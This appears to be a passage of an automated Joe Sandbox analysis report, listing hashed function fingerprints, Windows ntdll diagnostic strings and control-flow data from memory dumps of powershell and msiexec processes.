                                                                        • Opcode Fuzzy Hash: 911b2454e45effd691bb831b54e1d8edc426dc0ca19c31ae6d3a35106143e7f5
                                                                        • Instruction Fuzzy Hash: 77A146B1704306CFCB258A388A5066E7BE5FF82690F1488BADA45CB353DB35CC45C7A2
                                                                        Function 077FCF15 Relevance: 11.5, Strings: 9, Instructions: 209COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                                                        • API String ID: 0-3118609902
                                                                        • Opcode ID: 4a19fc87bcf996d60f0debf745b36522b6b9e27bb28b92b6818130551ccc5c52
                                                                        • Instruction ID: da16dc388d3179864b1e206953b5b580c5642cc0850b2e7f79806947996ab427
                                                                        • Opcode Fuzzy Hash: 4a19fc87bcf996d60f0debf745b36522b6b9e27bb28b92b6818130551ccc5c52
                                                                        • Instruction Fuzzy Hash: 69712DB1710205DFCB359F78CA6066ABBE2EF85750F154C55DA018B350DB31DC46C761
                                                                        Function 077F42E8 Relevance: 10.5, Strings: 8, Instructions: 496COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-3118171705
                                                                        • Opcode ID: 55a85b7d3bcc9d71794d159a656a226045fdc31dd5160b8ba1ff73e3e8115384
                                                                        • Instruction ID: 9017a0d85ce35f0c3b32c8ee0311b8e54d6107c0bd0f88297bf81af193f5b6b0
                                                                        • Opcode Fuzzy Hash: 55a85b7d3bcc9d71794d159a656a226045fdc31dd5160b8ba1ff73e3e8115384
                                                                        • Instruction Fuzzy Hash: D4F149B17043869FCB259F7D8A9067BBBE5EFC2290F1488BADA45CB351DA31C841C761
                                                                        Function 077F1EB8 Relevance: 10.4, Strings: 8, Instructions: 389COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$t~pq$$]q$$]q$$]q
                                                                        • API String ID: 0-462330472
                                                                        • Opcode ID: d0b46ee2ecf7c464a07fab6037946117215f29b221710b411b1011f6a31543ab
                                                                        • Instruction ID: 3055dba0a3206c9b4099d1193e342416828129f472f86c7e53d4c3a41fbac010
                                                                        • Opcode Fuzzy Hash: d0b46ee2ecf7c464a07fab6037946117215f29b221710b411b1011f6a31543ab
                                                                        • Instruction Fuzzy Hash: 23D149B1B002069FCB249F788A5066EBBE6FFC5350F14886AD655CB352DF31C946C7A2
                                                                        Function 077F9C48 Relevance: 9.2, Strings: 7, Instructions: 482COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-108373575
                                                                        • Opcode ID: 685cd932a6d4fbecf40549433274e396d31ac7d51637b302cfcdbc99b7617881
                                                                        • Instruction ID: 279b75593a939a712f681e9812be6a8ba835be3b02f3567311b22900859aa552
                                                                        • Opcode Fuzzy Hash: 685cd932a6d4fbecf40549433274e396d31ac7d51637b302cfcdbc99b7617881
                                                                        • Instruction Fuzzy Hash: 43F159B17043058FC7248B7885117AABBF5AFC2350F15C86AD719CB351DB31E945CBA1
                                                                        Function 077F1E20 Relevance: 6.4, Strings: 5, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$$]q$$]q
                                                                        • API String ID: 0-451802133
                                                                        • Opcode ID: 8fe2db5b1e937859f96d6aa00677a47c2340e17ab51756b8ed178d15c3f68a80
                                                                        • Instruction ID: 72b90fc2ab45eb65352ca9dce3ba931e78015f73517e3784e40b61f360c69a69
                                                                        • Opcode Fuzzy Hash: 8fe2db5b1e937859f96d6aa00677a47c2340e17ab51756b8ed178d15c3f68a80
                                                                        • Instruction Fuzzy Hash: 9C414DB160938ADFC7298F288B502657FF1BF42690F594897C684CB393D7358945C762
                                                                        Function 077FD26D Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                        • API String ID: 0-2353078639
                                                                        • Opcode ID: dc16f70b57078da4a29456de7176334dda788f191b74105755f90091d7d99659
                                                                        • Instruction ID: 544bdd3d7d94436cfe320b3398673a91d235480b001a0e9568d518b614cfab3e
                                                                        • Opcode Fuzzy Hash: dc16f70b57078da4a29456de7176334dda788f191b74105755f90091d7d99659
                                                                        • Instruction Fuzzy Hash: 8C3133F2B04317CFCB394A699A702B6B7E6AFC6191B24486BCB41CB345DA35C445C7A2
                                                                        Function 077F887E Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-2702571027
                                                                        • Opcode ID: ada3eede91e14f4bdd58edf60a174450da7e58df8cf521976d66a2ce10afce8c
                                                                        • Instruction ID: b8d88803f1d7458cb581d48ba6077446998898deb6e59eca8c50b37c8b2a840b
                                                                        • Opcode Fuzzy Hash: ada3eede91e14f4bdd58edf60a174450da7e58df8cf521976d66a2ce10afce8c
                                                                        • Instruction Fuzzy Hash: 1641C4B0A15206EBDB24CF15C740B79B7B2EB857A0F18C866EA555B390C731E941CB53
                                                                        Function 077FD016 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                                                        • API String ID: 0-1723543176
                                                                        • Opcode ID: 7d77b36a4113b23f47a661b49a9b578d086674c84091737f16a10449d8450460
                                                                        • Instruction ID: 8eede6d4eb7f9710d9c3d92132b7033f0bd80694ed3234bc234df41de2487343
                                                                        • Opcode Fuzzy Hash: 7d77b36a4113b23f47a661b49a9b578d086674c84091737f16a10449d8450460
                                                                        • Instruction Fuzzy Hash: F231B3B1B10104DFC734DF68C9A4A5ABBB2FF88750F258959EA056B350C731DC42CB91
                                                                        Function 077FC780 Relevance: 5.5, Strings: 4, Instructions: 477COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (o]q$(o]q$(o]q$(o]q
                                                                        • API String ID: 0-1261621458
                                                                        • Opcode ID: 120ced9bb22f274d60fcccce11ad0af1046f18e34b5f084fd42815318357e95d
                                                                        • Instruction ID: c0c36ba8d0b4830adaafa357c7b59db80af97a1223e9c69b59ee959b05ab6068
                                                                        • Opcode Fuzzy Hash: 120ced9bb22f274d60fcccce11ad0af1046f18e34b5f084fd42815318357e95d
                                                                        • Instruction Fuzzy Hash: D6F148B170430ADFDB16CF68CA50BAA7BE1EF86350F14886AE6158B391DB31D845C7B1
                                                                        Function 077F1070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $]q$$]q$$]q$$]q
                                                                        • API String ID: 0-858218434
                                                                        • Opcode ID: c228171ec2811fb2c9b76a93f24eae75bbf388c34a603a956fc5796f05f9cefe
                                                                        • Instruction ID: 5a39c86b18365f211ebecff8cac115c7f3448b3e71266294a7a810329eca7710
                                                                        • Opcode Fuzzy Hash: c228171ec2811fb2c9b76a93f24eae75bbf388c34a603a956fc5796f05f9cefe
                                                                        • Instruction Fuzzy Hash: C82137B131024ADBDB38556A8A50B27B6DAAFC1655FA48C2AAA05C7381DD76C841C361
                                                                        Function 077F8B10 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $]q$$]q$$]q$$]q
                                                                        • API String ID: 0-858218434
                                                                        • Opcode ID: a5133f774bd7732ede76b9082f747be734816bbef80e435fa898d99af92515a9
                                                                        • Instruction ID: fc7c50ca312b783bbea2bf627d401986a6adf351938c61023e304116528d2239
                                                                        • Opcode Fuzzy Hash: a5133f774bd7732ede76b9082f747be734816bbef80e435fa898d99af92515a9
                                                                        • Instruction Fuzzy Hash: BC11B1F1A14307DBDB348F59C74167AB7F5AB86691F1848BACA448B301D731C585C793
                                                                        Function 077F1CC0 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q
                                                                        • API String ID: 0-978391646
                                                                        • Opcode ID: 5ba4b07e162fe7b816fda3bf59c8b89460f4ff621e0143a857181d1829b639ea
                                                                        • Instruction ID: ad887d94775fd3d14b763265832ed8b73c1b6e7ac86cf67fd54c05cef59fede0
                                                                        • Opcode Fuzzy Hash: 5ba4b07e162fe7b816fda3bf59c8b89460f4ff621e0143a857181d1829b639ea
                                                                        • Instruction Fuzzy Hash: 3B0126707083899FC33E422C19202A56FF68FC3850F6A09EBC191DF3A7CD158C0683A6

                                                                        Execution Graph

                                                                        Execution Coverage:0%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:23.1%
                                                                        Total number of Nodes:108
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 66252 2212a210 7 API calls 66253 220eea0c 590 API calls __startOneArgErrorHandling 66389 22171810 551 API calls 66255 2217321f 374 API calls 2 library calls 66256 2216da1d 325 API calls _vswprintf_s 66390 22128402 551 API calls 2 library calls 66258 22128600 7 API calls 66392 2212cc00 332 API calls 66263 220e8210 191 API calls 66399 2212a430 408 API calls _vswprintf_s 66402 22175430 9 API calls _vswprintf_s 66403 2212bc3b 327 API calls __startOneArgErrorHandling 66404 220ea020 324 API calls 66405 220ec020 10 API calls 66406 220ee420 400 API calls __startOneArgErrorHandling 66270 2210e627 347 API calls __except_handler4 66410 22176020 325 API calls 66411 22176420 331 API calls __startOneArgErrorHandling 66272 22128e2f 351 API calls 66273 220fba30 541 API calls 66413 2211b052 352 API calls 2 library calls 66414 2216f450 190 API calls 66415 2219705e 567 API calls __except_handler4 66416 22176050 323 API calls _vswprintf_s 66417 220e7440 5 API calls __startOneArgErrorHandling 66277 2210fa40 556 API calls 2 library calls 66278 22127a40 327 API calls 66418 220e645d 552 API calls __startOneArgErrorHandling 66421 220f2050 346 API calls 66423 22129870 402 API calls 66249 22132c70 LdrInitializeThunk 66286 220e826b 349 API calls __startOneArgErrorHandling 66424 220eec6b 589 API calls 66425 2216d070 191 API calls 66426 2216f87e 326 API calls 66287 220e9660 551 API calls 66289 22129660 559 API calls __startOneArgErrorHandling 66294 220e7a80 344 API calls __startOneArgErrorHandling 66437 2212909c 345 API calls 2 library calls 66438 220eb480 196 API calls 66296 22146282 328 API calls 66298 22123e8f 326 API calls 66443 220eb890 548 API calls 66299 220f1ea0 16 API calls 66300 221052a0 372 API calls 2 library calls 66447 2212bca0 539 API calls 66303 2212c6a6 550 API calls 2 library calls 66448 2216cca0 328 API calls 66449 220e78b0 192 API calls 66305 2216daa9 341 API calls __startOneArgErrorHandling 66450 220f3cb0 14 API calls 66308 220eb2c0 343 API calls 66310 2211eac0 340 API calls 66454 2210ccc2 199 API calls 66455 2216d0c0 324 API calls __swprintf_c_l 66314 22171acb 192 API calls 2 library calls 66457 221320f0 8 API calls __startOneArgErrorHandling 66459 221754f0 553 API calls 2 library calls 66317 220ea2e0 535 API calls 2 library calls 66318 2211d6e0 690 API calls 2 library calls 66320 220efef0 11 API calls 66464 220ec0f0 343 API calls 66465 220f24f0 598 API calls 66466 220f98f0 575 API calls 66322 22127b13 706 API calls 66469 220ee104 348 API calls 66470 220f2102 202 API calls 66327 220e8300 325 API calls 66328 220ebf00 334 API calls 66471 220f0100 564 API calls 2 library calls 66478 220eb120 410 API calls 66479 22174d39 329 API calls 2 library calls 66337 220f3720 337 API calls __startOneArgErrorHandling 66338 2211eb20 348 API calls 66339 2212f320 328 API calls __startOneArgErrorHandling 66342 220e7330 323 API calls _vswprintf_s 66349 22172349 585 API calls 2 library calls 66350 2210d770 6 API calls __startOneArgErrorHandling 66489 2212b970 367 API calls 66352 2219437c 327 API calls 66353 22176b70 329 API calls 66358 220fc770 GetPEB __except_handler4 66495 2216e190 LdrInitializeThunk __startOneArgErrorHandling 66359 221a9793 8 API calls __startOneArgErrorHandling 66360 220ebf80 348 API calls __startOneArgErrorHandling 66361 220f0780 348 API calls 66365 22132380 705 API calls __startOneArgErrorHandling 66366 220ea790 410 API calls 66497 2211f5b0 336 API calls 3 library calls 66500 220ec1a0 332 API calls 66369 221233a0 329 API calls __startOneArgErrorHandling 66503 22126da0 330 API calls 66510 2211add0 333 API calls 66511 2211cdd0 GetPEB GetPEB 66372 221263d0 597 API calls 2 library calls 66373 221297d0 330 API calls 66514 2216e1d0 195 API calls __swprintf_c_l 66515 2216d5d0 326 API calls _vswprintf_s 66516 220f59c0 777 API calls 2 library calls 66517 221165c0 416 API calls _vswprintf_s 66375 221707c3 346 API calls 2 library calls 66377 221763c0 334 API calls 66520 220ec1d0 589 API calls 66380 2211c3f0 329 API calls 66382 2211cbf0 GetPEB GetPEB GetPEB GetPEB 66526 220e81e6 7 API calls 66529 221259e0 328 API calls 66532 221719ee GetPEB GetPEB GetPEB

                                                                        Executed Functions

                                                                        Function 221335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1 221335c0-221335cc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f53bb898850c6d0e095bd48fa1065724ba7cda4ab9fd6f2610c4b50932698642
                                                                        • Instruction ID: ef141936066e31ed17c9118ea116d4d969ceb0caab14b9537c2b5049cc0514f8
                                                                        • Opcode Fuzzy Hash: f53bb898850c6d0e095bd48fa1065724ba7cda4ab9fd6f2610c4b50932698642
                                                                        • Instruction Fuzzy Hash: EC900231A4564402D10071584954B06140547D0201FB6C412A0465528D8BD58B51A5A2
                                                                        Function 22132C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 22132c70-22132c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: bda04a84ccec9793c1b518d3fd75ce479e4fea9e2eff68c7684a66aaaeeddf9f
                                                                        • Instruction ID: b6e765effc8423570cf5d6c4107a38d2f234878efcad6cfd24ade13963d89dde
                                                                        • Opcode Fuzzy Hash: bda04a84ccec9793c1b518d3fd75ce479e4fea9e2eff68c7684a66aaaeeddf9f
                                                                        • Instruction Fuzzy Hash: 949002316415C802D11071588844B4A040547D0301FAAC412A4465618D8AD58A91B121

                                                                        Non-executed Functions

                                                                        Function 22172349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2160512332
                                                                        • Opcode ID: b6bc05a2f18d6cdcbd7e45996973e442a83d7f65e1884e22da26f7557cc0744a
                                                                        • Instruction ID: 159fd3a2aef1cdc35522ad65437c1fc9b5146d70f5b1c4a37d112fd9e9bccc21
                                                                        • Opcode Fuzzy Hash: b6bc05a2f18d6cdcbd7e45996973e442a83d7f65e1884e22da26f7557cc0744a
                                                                        • Instruction Fuzzy Hash: C3927A71688381AFE325CF20C980F9BB7F8BB84754F10492DFA949B251D7B0DA45CB92
                                                                        Function 22128620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 623 22128620-22128681 624 22165297-2216529d 623->624 625 22128687-22128698 623->625 624->625 626 221652a3-221652b0 GetPEB 624->626 626->625 627 221652b6-221652b9 626->627 628 221652d6-221652fc call 22132ce0 627->628 629 221652bb-221652c5 627->629 628->625 634 22165302-22165306 628->634 629->625 630 221652cb-221652d4 629->630 632 2216532d-22165341 call 220f54a0 630->632 638 22165347-22165353 632->638 634->625 637 2216530c-22165321 call 22132ce0 634->637 637->625 646 22165327 637->646 640 2216555c-22165568 call 2216556d 638->640 641 22165359-2216536d 638->641 640->625 644 2216536f 641->644 645 2216538b-22165401 641->645 648 22165371-22165378 644->648 651 22165403-22165435 call 220efd50 645->651 652 2216543a-2216543d 645->652 646->632 648->645 650 2216537a-2216537c 648->650 653 22165383-22165385 650->653 654 2216537e-22165381 650->654 665 2216554d-22165552 call 2217a4b0 651->665 656 22165514-22165517 652->656 657 22165443-22165494 652->657 653->645 658 22165555-22165557 653->658 654->648 656->658 659 22165519-22165548 call 220efd50 656->659 662 22165496-221654cc call 220efd50 657->662 663 221654ce-22165512 call 220efd50 * 2 657->663 658->638 659->665 662->665 663->665 665->658
                                                                        Strings
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 221654CE
                                                                        • Critical section debug info address, xrefs: 2216541F, 2216552E
                                                                        • Critical section address, xrefs: 22165425, 221654BC, 22165534
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 221654E2
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2216540A, 22165496, 22165519
                                                                        • 8, xrefs: 221652E3
                                                                        • undeleted critical section in freed memory, xrefs: 2216542B
                                                                        • Invalid debug info address of this critical section, xrefs: 221654B6
                                                                        • double initialized or corrupted critical section, xrefs: 22165508
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 22165543
                                                                        • corrupted critical section, xrefs: 221654C2
                                                                        • Address of the debug info found in the active list., xrefs: 221654AE, 221654FA
                                                                        • Critical section address., xrefs: 22165502
                                                                        • Thread identifier, xrefs: 2216553A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        • API String ID: 0-2368682639
                                                                        • Opcode ID: d537fba30fb8509db6fc8588b7f739a0a18b5c365a14436285d17d7442103dd6
                                                                        • Instruction ID: 70fb9635ea0ddd95eade5294f60ded77f3431a74ae33e69dcc6cf99f6360cc1b
                                                                        • Opcode Fuzzy Hash: d537fba30fb8509db6fc8588b7f739a0a18b5c365a14436285d17d7442103dd6
                                                                        • Instruction Fuzzy Hash: D58189B1A41358FFEB10CF95C984FAEBBB5EB48714F514119F608B7240D335AA41DBA4
                                                                        Function 221A12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                        • API String ID: 0-3591852110
                                                                        • Opcode ID: eab8ad7dc95ef6a6b406f0f2bbea2769cae342f69379cf3a80d3afd037cd1600
                                                                        • Instruction ID: 4616c73df2c06f6272600dec05dc77d96c8070af862ab3103ff87c4542c6c29e
                                                                        • Opcode Fuzzy Hash: eab8ad7dc95ef6a6b406f0f2bbea2769cae342f69379cf3a80d3afd037cd1600
                                                                        • Instruction Fuzzy Hash: 5512DC78640742DFD7158F68C5A0FBABBF2FF19314F048459E49A8B662D734EA80DB90
                                                                        Function 220ED34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1758 220ed34c-220ed38d 1759 2214a90d 1758->1759 1760 220ed393-220ed395 1758->1760 1762 2214a917-2214a930 call 221ac188 1759->1762 1760->1759 1761 220ed39b-220ed39e 1760->1761 1761->1759 1763 220ed3a4-220ed3ac 1761->1763 1770 2214a936-2214a939 1762->1770 1771 220ed5ca-220ed5cd 1762->1771 1765 220ed3ae-220ed3b0 1763->1765 1766 220ed3b6-220ed401 call 22135130 call 22132b90 1763->1766 1765->1766 1768 2214a867-2214a86c 1765->1768 1783 2214a871-2214a88b call 220e7270 1766->1783 1784 220ed407-220ed410 1766->1784 1773 220ed620-220ed628 1768->1773 1775 220ed5ad-220ed5af 1770->1775 1774 220ed5cf-220ed5d5 1771->1774 1778 220ed69b-220ed69d 1774->1778 1779 220ed5db-220ed5e8 GetPEB call 22103ca0 1774->1779 1775->1771 1777 220ed5b1-220ed5c4 call 22113342 1775->1777 1777->1771 1792 2214a93e-2214a943 1777->1792 1785 220ed5ed-220ed5f2 1778->1785 1779->1785 1799 2214a895-2214a899 1783->1799 1800 2214a88d-2214a88f 1783->1800 1789 220ed41a-220ed42d call 220ed796 1784->1789 1790 220ed412-220ed414 1784->1790 1787 220ed5f4-220ed5fd call 22132b60 1785->1787 1788 220ed601-220ed606 1785->1788 1787->1788 1795 220ed608-220ed611 call 22132b60 1788->1795 1796 220ed615-220ed61a 1788->1796 1810 2214a8c9 1789->1810 1811 220ed433-220ed437 1789->1811 1790->1789 1794 2214a8a1-2214a8ac call 221ab1e1 1790->1794 1792->1771 1794->1789 1814 2214a8b2-2214a8c4 1794->1814 1795->1796 1796->1773 1801 2214a948-2214a94c call 22132b60 1796->1801 1799->1794 1800->1799 1806 220ed58e 1800->1806 1815 2214a951 1801->1815 1816 220ed590-220ed595 1806->1816 1819 2214a8d1-2214a8d3 1810->1819 1812 220ed43d-220ed457 call 220ed930 1811->1812 1813 220ed62b-220ed683 call 22135130 call 22132b90 1811->1813 1812->1819 1826 220ed45d-220ed4ae call 22135130 call 22132b90 1812->1826 1832 220ed685 1813->1832 1833 220ed6a2-220ed6a5 1813->1833 1814->1789 1815->1815 1820 220ed5a9 1816->1820 1821 220ed597-220ed599 1816->1821 